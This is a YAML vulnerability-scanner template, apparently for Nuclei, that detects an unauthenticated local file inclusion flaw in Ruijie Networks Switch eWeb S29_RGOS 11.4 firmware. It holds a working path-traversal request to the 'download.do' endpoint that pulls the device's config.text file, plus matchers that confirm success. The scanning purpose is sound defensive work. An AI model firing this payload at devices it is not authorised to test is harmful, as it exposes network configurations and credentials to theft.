id: ruijie-networks-lfi

info:
  name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI
  author: pikpikcu
  severity: high
  description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint.
  reference: https://exploit-db.com/exploits/48755
  tags: ruijie,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/download.do?file=../../../../config.text"
    matchers-condition: and
    matchers:

      - type: word
        words:
          - 'filename="config.text"'
          - "Content-Type: application/octet-stream"
        part: header
      - type: word
        words:
          - "version S29_RGOS 11.4"
        part: body
        condition: and

      - type: status
        status:
          - 200
